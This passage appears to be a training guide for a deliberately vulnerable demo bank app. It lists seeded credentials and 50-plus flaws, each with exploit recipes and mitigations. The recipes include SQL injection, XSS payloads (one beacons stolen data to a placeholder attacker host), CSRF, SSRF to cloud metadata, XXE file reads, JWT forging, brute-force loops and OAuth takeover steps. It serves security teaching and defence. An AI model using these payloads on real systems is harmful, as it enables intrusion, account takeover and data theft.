================================================================================
 NovaTrust Bank (vuln-bank) — Vulnerability index, exploit recipes, mitigations
================================================================================

Default base URL:   http://localhost:3001
Test credentials:
  alice.chen       / Password123!         (customer)
  bob.martinez     / Sunshine99           (customer)
  carol.singh      / autumn2023           (customer)
  david.okafor     / Letmein2024          (customer; large balance)
  eva.lindstrom    / fika4life            (customer)
  julie.morgan     / Admin2024!           (admin)
  finance_audit    / AuditTeam2024        (admin; ops account)

Default OTP for MFA:  424242
Default reset token:  printed on stdout when /forgot is hit
Hidden secret in JS bundle: sk_live_NOVATRUST_DEBUG_4242424242424242

--------------------------------------------------------------------------------
 INDEX
--------------------------------------------------------------------------------
 [01]  SQL injection — login form          (Ch 13)
 [02]  SQL injection — accounts search      (Ch 13)
 [03]  SQL injection — admin user search    (Ch 13)
 [04]  Reflected XSS — search result page   (Ch 14)
 [05]  Stored XSS — support messages        (Ch 14)
 [06]  DOM-based XSS — location.hash sink   (Ch 14, 34)
 [06a] Reflected XSS — naive blacklist (?strict=1) on search (Ch 14)
 [06b] Reflected XSS — attribute context on search refine input (Ch 14)
 [06c] Reflected XSS — JavaScript-string context on /login ?next= (Ch 14)
 [06d] DOM XSS — location.search ?banner= sink (Ch 14)

 [07]  IDOR / BAC — view any account        (Ch 11)
 [08]  BAC — admin endpoints unprotected    (Ch 11)
 [09]  BAC — privilege escalation via GET   (Ch 11, 23)
 [10]  Mass assignment — register w/ role=admin (A08, Ch 32)
 [11]  Mass assignment — API PUT /users/:id (Ch 32 API3)
 [12]  Prototype pollution — lodash.merge   (Ch 31)
 [13]  Race condition — duplicate transfer  (Ch 29)
 [14]  No CSRF protection — GET transfer     (Ch 23)
 [15]  Clickjacking — no X-Frame-Options     (Ch 23)
 [16]  Open redirect — /go?u= and /login?next= (Ch 16)
 [17]  Weak password hashing (MD5)           (Ch 12)
 [18]  JWT — alg=none accepted               (Ch 26)
 [19]  JWT — weak HS256 secret               (Ch 26)
 [20]  MFA bypass — client-controlled success (Ch 19)
 [21]  No rate limiting — MFA + reset brute force (Ch 19)
 [22]  Weak password reset — 4-digit numeric token (Ch 16, 19)
 [23]  User enumeration — login + reset messages (Ch 19)
 [24]  SSRF — webhook validation + statement import (Ch 22)
 [25]  XXE — XML statement import            (Ch 25)
 [26]  Path traversal — /statements/file?name= (Ch 11, A05)
 [27]  Arbitrary file upload — multer disk storage (Ch 24)
 [28]  Excessive data exposure — /api/me returns SSN + password_md5 (Ch 32 API3)
 [29]  BOLA — /api/users/:id, /api/accounts/:id (Ch 32 API1)
 [30]  Improper inventory — /api/v1/users unauth (Ch 32 API9)
 [31]  CORS — origin reflection w/ credentials (Ch 17, 23)
 [32]  Cache poisoning — X-Forwarded-Host echoed in Link header (Ch 31)
 [33]  Debug endpoint exposed — /debug        (Ch 17)
 [34]  Verbose error pages — full stack trace (Ch 17)
 [35]  Source-map disclosure — /static/js/app.js.map (Ch 34)
 [36]  Secret in JS bundle — sk_live_... (Ch 34)
 [37]  Sensitive data over HTTP — no HSTS / Secure cookie (Ch 12)
 [38]  Insecure session cookie — HttpOnly=false, no SameSite (Ch 19)
 [39]  Business logic — negative-amount transfer (Ch 16)
 [40]  Vulnerable component — jQuery 1.12.4 loaded (Ch 18)
 [41]  Audit logging — no failed-login records (Ch 21)
 [42]  Information leak — admin views return password_md5 + SSN in JSON (Ch 12)
 [43]  OAuth — lax redirect_uri (prefix match)        (Ch 24)
 [44]  OAuth — state parameter not validated by RP    (Ch 24)
 [45]  OAuth — implicit flow (token in URL fragment)  (Ch 24)
 [46]  OAuth — PKCE code_challenge_method=plain accepted (Ch 24)
 [47]  OAuth — authorization code reusable, 24h TTL   (Ch 24)
 [48]  OAuth — id_token alg=none accepted by IdP & RP (Ch 18, 24)
 [49]  OAuth — /userinfo ignores scope (returns full PII) (Ch 24)
 [50]  OAuth — nOAuth (prompt=none + login_hint = ATO) (Ch 24)
 [51]  OAuth — ROPC grant on public client            (Ch 24)
 [52]  OAuth — predictable refresh tokens             (Ch 24)
 [53]  Security misconfig — /.env at web root         (Ch 33, A05)
 [54]  Security misconfig — /.git/ exposed            (Ch 33, A05)
 [55]  Security misconfig — /internal/dashboard default creds admin:admin (Ch 33)
 [56]  Security misconfig — verbose Server + X-Powered-By banner (Ch 33)
 [57]  Security misconfig — backup file /static/backup/admin.js.bak (Ch 33)
 [58]  Security misconfig — support-token bypass header (Ch 33)
 [59]  Security misconfig — CORS reflected origin + credentials on /api (Ch 33)
 [60]  Security misconfig — /uploads/ directory listing enabled (Ch 33)
 [61]  Vulnerable component — jQuery 1.12.4 `$()` HTML parsing → DOM XSS via ?theme= (Ch 34)
 [62]  Software & Data Integrity — POST /admin/integrity/install accepts unsigned plugin code → RCE (Ch 35)
 [63]  Logging & Monitoring — failed logins and SSN-view actions are not audited; /admin/audit reachable by any logged-in user; CRLF log forgery via /forgot email (Ch 36)
 [64]  Client-side / modern frontend — no CSP, no SRI on jQuery/Bootstrap CDNs, postMessage/origin checks missing in cross-frame admin tooling (Ch 37)


--------------------------------------------------------------------------------
 [01] SQL injection — login form
--------------------------------------------------------------------------------
Endpoint:   POST /login
Files:      routes/auth.js (login handler concatenates `username` into SQL)

EXPLOIT
  curl -i -c j.cookie http://localhost:3001/login \
    -d "username=' OR '1'='1' --&password=anything&next=/accounts"
  # Logs in as the first user in the table (alice.chen).

MITIGATION
  Use parameterised queries (better-sqlite3 supports `.prepare(...).get(?)`).
  Verify password with a constant-time comparator after argon2id verification.

--------------------------------------------------------------------------------
 [02] SQL injection — accounts search
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/search?q=...

EXPLOIT
  # union-based — dump password hashes
  /accounts/search?q=x' UNION SELECT username, password_md5, role FROM users--
  # boolean-based — confirm injection
  /accounts/search?q=' OR '1'='1

MITIGATION
  Use a parameterised LIKE: `db.prepare('SELECT ... LIKE ?').all('%' + q + '%')`.

--------------------------------------------------------------------------------
 [03] SQL injection — admin user search
--------------------------------------------------------------------------------
Endpoint:   GET /admin/users?q=...    (after logging in as ANY user — BAC chain)

EXPLOIT
  /admin/users?q=%' UNION SELECT 1,username,password_md5,email,ssn,role FROM users--

MITIGATION
  Parameterised query AND a real role check via middleware.

--------------------------------------------------------------------------------
 [04] Reflected XSS — search result page
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/search?q=<svg onload=alert(1)>

EXPLOIT
  Visit /accounts/search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
  The search heading renders `<%- q %>` unescaped.

MITIGATION
  Use `<%= q %>` (HTML-escaping) or sanitise with a strict allow-list.

--------------------------------------------------------------------------------
 [05] Stored XSS — support messages
--------------------------------------------------------------------------------
Endpoint:   POST /support/submit  (any logged-in user)
Triggered:  Admin views /admin

EXPLOIT
  1. Log in as alice.chen.
  2. /support submit with body:
        <img src=x onerror="fetch('/api/me',{credentials:'include'}).then(r=>r.text()).then(t=>navigator.sendBeacon('http://attacker/log',t))">
  3. Admin (julie.morgan) loads /admin — payload fires in their browser.

MITIGATION
  Render with `<%= %>` (escaped) or sanitise via DOMPurify on render. Add CSP
  to block inline event handlers and external script loads.

--------------------------------------------------------------------------------
 [06] DOM-based XSS — location.hash sink
--------------------------------------------------------------------------------
File:       public/js/app.js  (slot.innerHTML = decoded hash)

EXPLOIT
  http://localhost:3001/accounts#<img src=x onerror=alert(document.cookie)>

MITIGATION
  Use `textContent` instead of `innerHTML`, or sanitise with DOMPurify.

--------------------------------------------------------------------------------
 [06a] Reflected XSS — naive blacklist on /accounts/search?strict=1
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/search?q=<payload>&strict=1
File:       routes/accounts.js (single-pass /<script[^>]*>.*?<\/script>/gi)

EXPLOIT (each bypass survives the filter and fires in the heading sink)
  /accounts/search?strict=1&q=%3Csvg%20onload%3Dalert(1)%3E
  /accounts/search?strict=1&q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
  /accounts/search?strict=1&q=%3Ciframe%20srcdoc%3D%22%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E
  /accounts/search?strict=1&q=%3Cdetails%20open%20ontoggle%3Dalert(1)%3E
  /accounts/search?strict=1&q=%3Cmath%3E%3Cmtext%3E%3C%2Fmtext%3E%3Cmglyph%3E%3Cxss%20src%3Dx%20onerror%3Dalert(1)%3E
  # the filter only matches the literal <script>...</script> shape, so
  # every other tag family slips through trivially.

MITIGATION
  Do not blacklist. Either HTML-escape (`<%= %>`) or run output through a
  context-aware sanitiser (DOMPurify) with an explicit allow-list.

--------------------------------------------------------------------------------
 [06b] Reflected XSS — attribute context on /accounts/search refine input
--------------------------------------------------------------------------------
File:       views/account_search.ejs (<input value="<%- q %>">)

EXPLOIT (break out of the value="..." attribute, no </h1> needed)
  /accounts/search?q=%22%20autofocus%20onfocus%3Dalert(1)%20x%3D%22
  # i.e. q = " autofocus onfocus=alert(1) x="
  # The rendered HTML becomes: <input value="" autofocus onfocus=alert(1) x="">

MITIGATION
  Use the attribute-context escape (`<%= q %>` does this for EJS, encoding
  `"` to `&quot;` so the attribute cannot be broken out of). Or render the
  value via JavaScript with `input.value = q` and never inline it.

--------------------------------------------------------------------------------
 [06c] Reflected XSS — JavaScript string-literal context on /login ?next=
--------------------------------------------------------------------------------
Endpoint:   GET /login?next=<payload>
File:       views/login.ejs
            <script>var lastNext = "<%- next.replace(/"/g,'\\\"') %>";</script>

EXPLOIT (the developer escaped `"` but forgot to escape `\`, so a payload
ending in `\` consumes the escape of the following `"`, ending the string
exactly where the developer thought it was safest)
  /login?next=%5C%22%3Balert(1)%3B%2F%2F
  # i.e. next = \";alert(1);//
  # Rendered: var lastNext = "\\";alert(1);//";
  #   -> string ends after `\\`, then a literal `;alert(1);//` statement
  #   -> alert(1) fires on page load

MITIGATION
  Never reflect user input into an inline <script>. If you must, JSON.stringify
  the value AND HTML-escape the output: `<%= JSON.stringify(next) %>`. Better:
  expose the value via a `data-*` attribute and read it with dataset.

--------------------------------------------------------------------------------
 [06d] DOM XSS — location.search ?banner= sink
--------------------------------------------------------------------------------
File:       public/js/app.js  (slot.innerHTML = URLSearchParams('banner'))

EXPLOIT (unlike the hash sink, this query parameter IS sent to the server, so
Reqlore History will show the request, but the actual rendering happens in
the browser DOM and the value never touches a template)
  http://localhost:3001/accounts?banner=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

MITIGATION
  Use `textContent`, or sanitise the value via DOMPurify before assigning
  to `innerHTML`. Better: do not read URL state into the DOM at all without
  a strict allow-list of values.

--------------------------------------------------------------------------------
 [07] IDOR / BAC — view any account
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/:id

EXPLOIT
  Log in as eva.lindstrom. Walk IDs 1..10:
    for i in 1..10; do curl -b cookies http://localhost:3001/accounts/$i; done
  All other customers' accounts are returned, including balance and recent tx.

MITIGATION
  Add `WHERE id = ? AND user_id = ?` to the lookup query.

--------------------------------------------------------------------------------
 [08] BAC — admin endpoints unprotected
--------------------------------------------------------------------------------
Endpoints:  /admin, /admin/users, /admin/users/:id, /admin/promote, /admin/users/:id/delete

EXPLOIT
  Log in as any customer (alice.chen). Visit /admin directly.

MITIGATION
  Add `requireRole('admin')` middleware to the whole /admin sub-tree.

--------------------------------------------------------------------------------
 [09] BAC — privilege escalation via GET
--------------------------------------------------------------------------------
Endpoint:   GET /admin/promote?id=<your-id>

EXPLOIT
  Same as [08] plus: visit /admin/promote?id=1 to make user id=1 an admin.
  Combine with [14] — an attacker page can <img src> this URL while alice is
  logged in to silently promote a target.

MITIGATION
  Use POST + CSRF token + role check.

--------------------------------------------------------------------------------
 [10] Mass assignment — register w/ role=admin
--------------------------------------------------------------------------------
Endpoint:   POST /register

EXPLOIT
  curl -d "username=evilbob&password=p&email=e@e&role=admin" \
    http://localhost:3001/register
  Log in as evilbob — full admin access.

MITIGATION
  Whitelist the fields the controller accepts; never accept `role` from the form.

--------------------------------------------------------------------------------
 [11] Mass assignment — API PUT /users/:id
--------------------------------------------------------------------------------
Endpoint:   PUT /api/users/:id

EXPLOIT
  TOKEN=$(curl -s -d '{"username":"alice.chen","password":"Password123!"}' \
    -H 'Content-Type: application/json' http://localhost:3001/api/login | jq -r .token)
  curl -X PUT -H "Authorization: Bearer $TOKEN" -H 'Content-Type: application/json' \
    http://localhost:3001/api/users/1 -d '{"role":"admin","mfa_enabled":0}'

MITIGATION
  Allow-list updatable fields by role; never expose `role` to the customer
  endpoint.

--------------------------------------------------------------------------------
 [12] Prototype pollution — lodash.merge
--------------------------------------------------------------------------------
Endpoint:   POST /profile  (settings JSON merged into profile)

EXPLOIT
  1. As alice.chen, POST /profile with form field:
       settings = {"__proto__":{"isAdmin":true,"overdraftLimit":99999999}}
  2. Call /profile/admin-check — response shows `isAdmin: true`.

MITIGATION
  Use `Object.assign({}, target, source)` w/ key filter, or use `lodash.mergeWith`
  with a customizer that rejects `__proto__`/`prototype`/`constructor`. Upgrade
  lodash to 4.17.21+ and pair with a Map-based settings store.

--------------------------------------------------------------------------------
 [13] Race condition — duplicate transfer
--------------------------------------------------------------------------------
Endpoint:   POST /transfer/send (or GET /transfer/send)

EXPLOIT
  # Issue 20 transfers in parallel for a single account
  for i in {1..20}; do
    curl -s -b cookies "http://localhost:3001/transfer/send?from=4002-1188-0001&to=4002-9999-0001&amount=1000000&memo=race" &
  done; wait
  # Multiple transfers succeed past the balance check, ending with a
  # negative balance because the per-row update is not transactional with
  # the balance read.

MITIGATION
  Wrap the read-check-update in a single SQL transaction with row locking
  (e.g. `UPDATE accounts SET balance = balance - ? WHERE id = ? AND balance >= ?`).

--------------------------------------------------------------------------------
 [14] No CSRF protection — GET transfer
--------------------------------------------------------------------------------
Endpoint:   GET /transfer/send

EXPLOIT
  Host this on attacker.example:
    <img src="http://localhost:3001/transfer/send?from=4002-1188-0001&to=4002-9999-0001&amount=999999&memo=hi" />
  Browse to it while alice.chen is logged in → transfer sent.

MITIGATION
  Disallow state-changing GETs. Add a synchroniser/double-submit CSRF token
  to all POSTs. Set SameSite=Lax on the session cookie at minimum.

--------------------------------------------------------------------------------
 [15] Clickjacking — no X-Frame-Options
--------------------------------------------------------------------------------
EXPLOIT
  <iframe src="http://localhost:3001/admin/promote?id=2"></iframe>
  Style the iframe transparent and overlay a "Win a prize" button.

MITIGATION
  Set `X-Frame-Options: DENY` (or CSP `frame-ancestors 'none'`) for all
  authenticated pages.

--------------------------------------------------------------------------------
 [16] Open redirect — /go?u= and /login?next=
--------------------------------------------------------------------------------
EXPLOIT
  http://localhost:3001/go?u=https://evil.example.com/phish
  http://localhost:3001/login?next=https://evil.example.com/phish

MITIGATION
  Validate the destination: allow only relative paths starting with `/` and
  not `//`. For external redirects, require an allow-list of hostnames.

--------------------------------------------------------------------------------
 [17] Weak password hashing (MD5)
--------------------------------------------------------------------------------
File:       lib/auth.js — md5(password)

EXPLOIT
  Dump users via [02] / [11], crack hashes:
    hashcat -m 0 hashes.txt rockyou.txt
  All seeded passwords crack in seconds.

MITIGATION
  argon2id (preferred) or bcrypt with cost ≥ 12. Add per-user salt.

--------------------------------------------------------------------------------
 [18] JWT — alg=none accepted
--------------------------------------------------------------------------------
File:       lib/auth.js — verifyToken trusts alg=none

EXPLOIT
  python -c "import json,base64;h=base64.urlsafe_b64encode(b'{\"alg\":\"none\",\"typ\":\"JWT\"}').strip(b'=');\
  p=base64.urlsafe_b64encode(b'{\"sub\":1,\"username\":\"alice.chen\",\"role\":\"admin\"}').strip(b'=');\
  print((h+b'.'+p+b'.').decode())"
  curl -H "Authorization: Bearer <token>" http://localhost:3001/api/me

MITIGATION
  Never pass `none` to `algorithms`. Pin to `['HS256']` or `['RS256']`.

--------------------------------------------------------------------------------
 [19] JWT — weak HS256 secret
--------------------------------------------------------------------------------
Secret:     bank-dev-secret-2024

EXPLOIT
  jwt_tool -C -d /usr/share/wordlists/jwt.secrets.list <token>
  hashcat -m 16500 <token> rockyou.txt

MITIGATION
  Use 256-bit random secrets stored in a KMS/secret store.

--------------------------------------------------------------------------------
 [20] MFA bypass — client-controlled success
--------------------------------------------------------------------------------
Endpoint:   POST /mfa/verify

EXPLOIT
  Log in as a user that has mfa_enabled=1 (enable it via PUT /api/users/:id).
  Then:
    curl -b cookies -d 'success=true&next=/accounts' http://localhost:3001/mfa/verify

MITIGATION
  Never trust client-supplied success flags. Verify the TOTP server-side and
  count attempts (lock after N failures).

--------------------------------------------------------------------------------
 [21] No rate limiting — MFA + reset brute force
--------------------------------------------------------------------------------
EXPLOIT
  for i in $(seq 0 999999); do
    code=$(printf '%06d' $i)
    s=$(curl -sb cookies -o /dev/null -w '%{http_code}' \
      -d "code=$code&next=/" http://localhost:3001/mfa/verify)
    [ "$s" = "302" ] && echo "OTP=$code" && break
  done

MITIGATION
  Per-account + per-IP attempt counters with exponential lockout and alerting.

--------------------------------------------------------------------------------
 [22] Weak password reset — 4-digit numeric token
--------------------------------------------------------------------------------
EXPLOIT
  curl -d 'email=alice.chen@gmail.com' http://localhost:3001/forgot
  # Then brute the 4-digit token (10 000 candidates):
  for t in $(seq 1000 9999); do
    s=$(curl -s -o /dev/null -w '%{http_code}' \
      -d "email=alice.chen@gmail.com&token=$t&password=Pwned1!" http://localhost:3001/reset)
    [ "$s" = "302" ] && echo "token=$t" && break
  done

MITIGATION
  128-bit URL-safe random tokens, single-use, 15-min TTL, hashed at rest,
  delivered only via email/SMS.

--------------------------------------------------------------------------------
 [23] User enumeration — login + reset messages
--------------------------------------------------------------------------------
EXPLOIT
  POST /login   -> "No such user." vs "Password incorrect."
  POST /forgot  -> "No account with that email."

MITIGATION
  Return identical text and status codes for both states. Run a dummy hash
  check even when the user does not exist.

--------------------------------------------------------------------------------
 [24] SSRF — webhook validation + statement import
--------------------------------------------------------------------------------
Endpoints:  POST /webhooks, POST /statements/import

EXPLOIT
  # Cloud metadata (AWS):
  curl -b cookies -d 'url=http://169.254.169.254/latest/meta-data/iam/security-credentials/' \
    http://localhost:3001/statements/import
  # Internal port scan:
  for p in 22 80 443 5432 6379; do
    curl -s -b cookies -d "url=http://127.0.0.1:$p" \
      http://localhost:3001/statements/import | head -c 40
  done

MITIGATION
  Resolve the URL, reject RFC-1918 / loopback / link-local addresses
  (DNS rebind-safe: verify the resolved IP, then connect to that IP with
  Host header). Use a network egress allow-list.

--------------------------------------------------------------------------------
 [25] XXE — XML statement import
--------------------------------------------------------------------------------
Endpoint:   POST /statements/import-xml (Content-Type: application/xml)

EXPLOIT (file read on UNIX-like containers)
  curl -b cookies -H 'Content-Type: application/xml' \
    --data-binary @- http://localhost:3001/statements/import-xml <<'XML'
  <?xml version="1.0"?>
  <!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
  <r>&xxe;</r>
  XML

  EXPLOIT (SSRF via XXE)
  <!DOCTYPE r [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
  <r>&xxe;</r>

MITIGATION
  Disable DOCTYPE processing. Use a parser configured with
  `disallow-doctype-decl=true` and no external entity resolution.

--------------------------------------------------------------------------------
 [26] Path traversal — /statements/file?name=
--------------------------------------------------------------------------------
EXPLOIT
  curl -b cookies 'http://localhost:3001/statements/file?name=../../../../etc/hosts'
  curl -b cookies 'http://localhost:3001/statements/file?name=../../seed.js'

MITIGATION
  Resolve to absolute path; reject if not within the uploads directory:
    const safe = path.resolve(UPLOAD_DIR, name);
    if (!safe.startsWith(UPLOAD_DIR + path.sep)) return 403;

--------------------------------------------------------------------------------
 [27] Arbitrary file upload
--------------------------------------------------------------------------------
EXPLOIT
  # Drop a webshell (works because Node serves /uploads statically and any
  # admin who clicks a "PDF" link will execute the redirect/JS)
  echo '<html><script>alert(document.cookie)</script>' > evil.html
  curl -b cookies -F 'file=@evil.html' -F 'account_id=1' \
    http://localhost:3001/statements/upload
  # Stored at http://localhost:3001/uploads/evil.html

MITIGATION
  Validate content-type AND magic bytes; rename to a server-generated name;
  serve from a separate hostname with `Content-Disposition: attachment` and a
  conservative CSP.

--------------------------------------------------------------------------------
 [28] Excessive data exposure — /api/me
--------------------------------------------------------------------------------
EXPLOIT
  curl -H "Authorization: Bearer $TOKEN" http://localhost:3001/api/me
  # Returns password_md5 + ssn + dob.

MITIGATION
  Pick fields explicitly in the SQL or a serialiser layer:
    SELECT id, username, email, full_name FROM users WHERE id = ?

--------------------------------------------------------------------------------
 [29] BOLA — /api/users/:id, /api/accounts/:id
--------------------------------------------------------------------------------
EXPLOIT
  curl -H "Authorization: Bearer $TOKEN" http://localhost:3001/api/users/2
  for i in 1..20; do curl ".../api/accounts/$i"; done

MITIGATION
  Enforce `id === jwt.sub` for the user route, and that the account belongs
  to `jwt.sub` for account routes.

--------------------------------------------------------------------------------
 [30] Improper inventory — /api/v1/users unauth
--------------------------------------------------------------------------------
EXPLOIT
  curl http://localhost:3001/api/v1/users      # no auth required

MITIGATION
  Retire old API versions; require auth on every route by middleware default.

--------------------------------------------------------------------------------
 [31] CORS — origin reflection w/ credentials
--------------------------------------------------------------------------------
EXPLOIT
  Host a page on https://evil.test that fetches /api/me with credentials:include.
  Server reflects the Origin and sets Allow-Credentials: true → response read
  by attacker JS.

MITIGATION
  Allow-list specific origins. Never combine `Allow-Origin: *` or reflection
  with `Allow-Credentials: true`.

--------------------------------------------------------------------------------
 [32] Cache poisoning — X-Forwarded-Host echoed in Link header
--------------------------------------------------------------------------------
Endpoint:   GET /admin (returns `Link: <https://<XFH>/admin>; rel="canonical"`)

EXPLOIT
  curl -H 'X-Forwarded-Host: attacker.com' http://localhost:3001/admin -I
  Subsequent cached responses inherit the poisoned Link → SEO/canonical hijack.

MITIGATION
  Don't trust upstream proxy headers unless you control the proxy. Compute
  the canonical URL from a configured base, not from request headers.

--------------------------------------------------------------------------------
 [33] Debug endpoint exposed
--------------------------------------------------------------------------------
EXPLOIT
  curl http://localhost:3001/debug   # leaks env vars, headers, session, cwd

MITIGATION
  Gate behind `NODE_ENV !== 'production'` or remove entirely. Better: feature
  flag via signed admin role check.

--------------------------------------------------------------------------------
 [34] Verbose error pages
--------------------------------------------------------------------------------
EXPLOIT
  Trigger any error (malformed query) — full stack trace + file paths leak.

MITIGATION
  In production: generic message + correlation ID. Log full details server-side.

--------------------------------------------------------------------------------
 [35] Source-map disclosure
--------------------------------------------------------------------------------
EXPLOIT
  curl http://localhost:3001/static/js/app.js.map
  # Includes original TypeScript w/ STRIPE_KEY, INTERNAL_GATEWAY, HMAC_SECRET.

MITIGATION
  Don't publish `.map` files in production, or restrict by IP / auth.

--------------------------------------------------------------------------------
 [36] Secret in JS bundle
--------------------------------------------------------------------------------
EXPLOIT
  grep -oE 'sk_live_[A-Za-z0-9_]+' /static/js/app.js

MITIGATION
  Never embed server-side secrets in client bundles. Use `NEXT_PUBLIC_*` /
  `VITE_*` style prefix conventions + secret scanning in CI.

--------------------------------------------------------------------------------
 [37] Sensitive data over HTTP — no HSTS / Secure cookie
--------------------------------------------------------------------------------
MITIGATION
  Serve only over HTTPS; set `Strict-Transport-Security: max-age=31536000;
  includeSubDomains; preload`. Mark cookies `Secure`.

--------------------------------------------------------------------------------
 [38] Insecure session cookie
--------------------------------------------------------------------------------
EXPLOIT
  console.log(document.cookie) — sid cookie readable from JS (HttpOnly=false).

MITIGATION
  Set cookie flags: `httpOnly: true, secure: true, sameSite: 'lax'`.

--------------------------------------------------------------------------------
 [39] Business logic — negative-amount transfer
--------------------------------------------------------------------------------
EXPLOIT
  /transfer/send?from=<victim>&to=<mine>&amount=-100000
  Negative subtraction increases source; addition decreases dest? Depending
  on signs — try both. Without server-side `amount > 0` check, you can
  rearrange balances.

MITIGATION
  Validate `amount > 0`, `from != to`, `currency` matches, daily caps.

--------------------------------------------------------------------------------
 [40] Vulnerable component — jQuery 1.12.4
--------------------------------------------------------------------------------
CVEs:  CVE-2015-9251 (XSS via $.parseHTML), CVE-2019-11358 (proto pollution
       via $.extend), CVE-2020-11022/11023 ($.html injection)

MITIGATION
  Upgrade to jQuery 3.7+ or remove jQuery. Add `retire.js` to CI.

--------------------------------------------------------------------------------
 [41] Audit logging — no failed-login records
--------------------------------------------------------------------------------
EXPLOIT
  Spray 10 000 logins — audit_log table stays empty.

MITIGATION
  Log every auth event (success/fail) with reason, IP, UA, request_id.

--------------------------------------------------------------------------------
 [42] Information leak — admin views return password_md5 + SSN
--------------------------------------------------------------------------------
EXPLOIT
  GET /admin/users/1 → JSON includes password_md5, ssn, reset_token.

MITIGATION
  Even for admins, don't expose hashes or full PII without a redaction layer
  and audit trail. Never expose a reset token after issuance.


--------------------------------------------------------------------------------
 [43] OAuth - lax redirect_uri (prefix match)
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize, POST /oauth/token
Files:      routes/oauth.js (redirectUriAllowed: uses startsWith)

EXPLOIT
  # Registered redirect_uri: http://localhost:3001/partners/demo-app/callback
  # Attacker appends a hostile suffix that startsWith() accepts:
  curl -i -b cookies.txt \
    "http://localhost:3001/oauth/authorize?client_id=partner-portal&response_type=code&scope=openid&redirect_uri=http%3A%2F%2Flocalhost%3A3001%2Fpartners%2Fdemo-app%2Fcallback.evil.example%2F&state=x"
  # IdP issues a code and redirects to the attacker host.

MITIGATION
  Compare redirect_uri with exact string equality. Reject query strings and
  fragments unless explicitly registered.

--------------------------------------------------------------------------------
 [44] OAuth - state parameter ignored at RP callback
--------------------------------------------------------------------------------
Endpoint:   GET /partners/demo-app/callback

EXPLOIT
  Attacker logs in to NovaTrust, requests a code for themselves, then sends
  the victim:
    http://localhost:3001/partners/demo-app/callback?code=<ATTACKER_CODE>&state=anything
  The RP exchanges the code, decodes the id_token, and signs the victim in
  AS THE ATTACKER (account-stitch attack).

MITIGATION
  Bind state to the RP's session before /authorize; verify on the callback.

--------------------------------------------------------------------------------
 [45] OAuth - implicit flow (token in URL fragment)
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize?response_type=token (or token id_token)

EXPLOIT
  Tokens are returned as URL fragments, exposing them to browser history,
  Referer headers (if the callback page contains an outbound link), and to
  any JS running on the callback page.

MITIGATION
  Drop implicit flow. Require response_type=code with PKCE for SPAs.

--------------------------------------------------------------------------------
 [46] OAuth - PKCE code_challenge_method=plain accepted
--------------------------------------------------------------------------------
Endpoint:   POST /oauth/token

EXPLOIT
  Attacker observes the authorization request (browser history, Referer,
  proxy logs) and extracts code_challenge. They submit the same value as
  code_verifier and pass PKCE.

MITIGATION
  Require code_challenge_method=S256. Reject plain.

--------------------------------------------------------------------------------
 [47] OAuth - authorization code reusable, 24h TTL
--------------------------------------------------------------------------------
Endpoint:   POST /oauth/token

EXPLOIT
  Capture the code (via referer leak, proxy log, lax redirect_uri, etc.).
  Replay it any time within 24 hours to mint new tokens.

MITIGATION
  Single-use codes; invalidate on first exchange. RFC 6749 mandates 10-minute
  max TTL. Bind code to client_id and redirect_uri.

--------------------------------------------------------------------------------
 [48] OAuth - id_token alg=none accepted
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize (id_token_signing_alg=none), and RP callback

EXPLOIT
  Client requests:
    /oauth/authorize?...&id_token_signing_alg=none
  IdP emits an unsigned id_token (header.alg=none, empty signature).
  Demo RP decodes it without verifying alg. An attacker who can MitM the
  callback can forge an unsigned id_token claiming any user.

MITIGATION
  Hardcode supported algorithms server-side (HS256, RS256, ES256). Reject
  alg=none and disable alg-confusion (e.g. HS256 with the RSA public key).

--------------------------------------------------------------------------------
 [49] OAuth - /userinfo ignores scope
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/userinfo

EXPLOIT
  Request a token with scope=openid only. Then:
    curl -H "Authorization: Bearer $T" http://localhost:3001/oauth/userinfo
  Response includes ssn, dob, phone_number, address, and role - all PII.

MITIGATION
  Map scopes to claim sets. openid -> sub only; email -> +email; profile ->
  +name, +preferred_username; etc. Never return SSN or DOB unless the scope
  was explicitly granted and consented to.

--------------------------------------------------------------------------------
 [50] OAuth - nOAuth (prompt=none + login_hint = ATO)
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize?prompt=none&login_hint=<victim_email>

EXPLOIT
  Attacker (authenticated as themselves) requests:
    /oauth/authorize?...&prompt=none&login_hint=victim@bank.test
  IdP issues an id_token whose `email` claim is the victim's email, but the
  `sub` belongs to the attacker. The RP merges accounts by `email` and signs
  the attacker in AS THE VICTIM. (Real bug class: nOAuth, 2023.)

MITIGATION
  Merge accounts by `sub`, never by `email`. Treat `email_verified` as a
  hint only; re-verify with a fresh email-confirmation flow.

--------------------------------------------------------------------------------
 [51] OAuth - ROPC grant on public client
--------------------------------------------------------------------------------
Endpoint:   POST /oauth/token (grant_type=password)

EXPLOIT
  curl -X POST http://localhost:3001/oauth/token \
    -d 'grant_type=password&username=alice.chen&password=Password123!&scope=openid&client_id=novatrust-mobile'
  No client_secret required - plaintext password to a "third-party" client.

MITIGATION
  Remove ROPC (deprecated by OAuth 2.1). Require redirect-based flows.

--------------------------------------------------------------------------------
 [52] OAuth - predictable refresh tokens
--------------------------------------------------------------------------------
EXPLOIT
  echo -n "1:1718999999999" | base64
  # MToxNzE4OTk5OTk5OTk5
  # Submit as refresh_token: time-ranged brute force is feasible because the
  # token is base64(user_id ':' epoch_ms).

MITIGATION
  refresh_token must be cryptographically random and at least 128 bits of
  entropy. Rotate on every use. Bind to client_id, scope and (optionally)
  device fingerprint.


--------------------------------------------------------------------------------
 [53] Security misconfig — /.env at web root
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  GET /.env
CHAPTER 33

EXPLOIT
  curl -s http://localhost:3001/.env
  # Returns DB creds, JWT secret, AWS/Stripe/SendGrid keys, INTERNAL_ADMIN_*.

MITIGATION
  Never deploy a `.env` next to served content. If the framework or build
